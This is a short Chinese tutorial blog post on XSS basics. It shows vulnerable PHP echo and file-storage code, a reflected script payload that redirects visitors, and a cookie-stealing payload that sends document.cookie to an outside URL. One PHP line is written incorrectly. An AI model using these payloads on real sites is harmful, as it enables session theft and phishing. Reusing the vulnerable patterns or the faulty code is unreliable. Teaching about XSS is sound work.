文档章节

XSS攻击基础

熊猫88
 熊猫88
发布于 2015/12/21 23:42
字数 490
阅读 160
收藏 12

XSS攻击是一个非常常见的攻击。
  1.最简单版本:
  <?php
     $name = $_GET['name'];
     echo  " hello  <br >$name";
   ?>
   本意是获取到了test后,告诉用户test提交成功
   www.test.com以为是个安全连接一般用户会被认为是
   www.test.com?name=boy 这种:
 实际上攻击者写的
 www.shopxiong.com/xss.php?name=<script>window.onload=function(){
  window.location.href="http://www.baidu.com";
 }</script>
经过url编码后
www.test.com/xss.php?name=%3Cscript%3Ewindow.onload=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
用户可能还误以为在www.test.com站点,其实此时会自动跳转到baidu.com网站里面。如果此时A和B非常相似,没有注意此时已经不是A站了(最常见的是钓鱼站点),会泄漏自己的账号信息
2.对A站点发送了一个恶意攻击的语句
   恶意语句依然和上面一样:%3Cscript%3Ewindow.onload=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
  test1.php
 <?php
    $text =  file_put_contents($_GET['text'],1.txt);
  ?>
  另外一个页面对这些进行读取  test2.php
  <?php  echo   file_get_contents("1.txt");  ?>
  当你访问test.php  无奈的发现,每当访问那个网站,都会自动跳转到baidu.com页面
  场景:恶意攻击者给某个用户进行留言(但是留言没有经过严格过滤,直接进行了暂时性的保存)然后另外一个用户点击查看恶意攻击者给其的留言的时候,触发该脚本(跳转到另外一个页面或者弹窗)
3.窃取当前用户的session或者网站cookie,对用户进行虚拟模仿
     document.cookie(可以获取到用户的session和相关登录后信息)
   仍然和上面相似。恶意攻击者通过某种手段把数据提交后
   在另一个页面进行调用
   www.shopxiong.com/xss.php?name=<script>window.onload=function(){
  window.location.href="http://www.shopxiong.com/test3.php?c="+document.cookie
 }</script>
  窃取当前访问者的cookie 然后通过另一个访问链接进行保存

© 著作权归作者所有

共有 人打赏支持
熊猫88
粉丝 18
博文 76
码字总数 65287
作品 0
程序员
Xss 跨站脚本测试平台--XssAPP

XssAPP 是一个专业的 XSS 渗透测试平台。 平台简介 用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。...

Coody
2017/02/07
550
0
前端基础重点回顾5:XSS、CSRF攻击

XSS 攻击前提 攻击脚本必须添加到页面上 攻击方式 跨站脚本XSS(Cross site script) 代码注入 script 标签注入攻击 标签属性注入攻击 广告注入 防止XSS攻击 获取的数据不允许进行字符串拼接 ...

jirengu_杨然
01/31
0
0
Web安全系列(三):XSS 攻击进阶(挖掘漏洞)

前言 在前些章节 (web安全系列(一):XSS 攻击基础及原理)以及(Web安全系列(二):XSS 攻击进阶(初探 XSS Payload))中,我详细介绍了 XSS 形成的原理以及 XSS 攻击的分类,并且编写了...

梁音
09/18
0
0
跨站脚本攻击(XSS)FAQ

原作者charlee、原始链接http://tech.idv2.com/2006/08/30/xss-faq/以及本声明。 该文章简单地介绍了XSS的基础知识及其危害和预防方法。Web开发人员的必读。译自 http://www.cgisecurity.com...

晨曦之光
2012/03/09
209
0
记一次简单的XSS攻击实验

之前就对XSS有所耳闻,不过昨天在学习《深入浅出nodejs》过程中,才深入了解到XSS攻击的原理,于是找到那本很早就想看的《web前端黑客技术解密》,找到 跨站攻击脚本XSS 章节,于是有了下面这...

趁你还年轻233
2017/12/02
0
0

没有更多内容

加载失败,请刷新页面

加载更多

EventBus原理深度解析

一、问题描述 在工作中,经常会遇见使用异步的方式来发送事件,或者触发另外一个动作:经常用到的框架是MQ(分布式方式通知)。如果是同一个jvm里面通知的话,就可以使用EventBus。由于Event...

yangjianzhou
22分钟前
2
0
OpenCV图像处理实例:libuv+cvui显示摄像头视频

#include <iostream>#include <opencv2/opencv.hpp>#define CVUI_IMPLEMENTATION#include <cvui.h>extern "C"{#include <uv.h>}using namespace std;#define WINDOW_NAM......

IOTService
29分钟前
1
0
openJDK之JDK9的String

1.openJDK8的String 先来看下openJDK8的String的底层,如下图1.1所示: 图1.1 底层上使用的是char[],即char数组 每个char占16个bit,Character.SIZE的值是16。 2.openJDK9中的String 图2.1...

克虏伯
30分钟前
1
0
UEFI 模式下如何安装 Ubuntu 16.04

作者:知乎用户 链接:https://www.zhihu.com/question/52092661/answer/259583475 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 针对UEFI模式下安装U...

寻知者
30分钟前
1
0
20180925 df与du命令、fdisk磁盘分区

df 命令 disk filesystem的缩写,查看已挂载磁盘的总容量、使用容量、剩余容量信息。 [root@centos01 ~]# dfFilesystem 1K-blocks Used Available Use% Mounted on/dev/sda3 27...

野雪球
今天
1
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部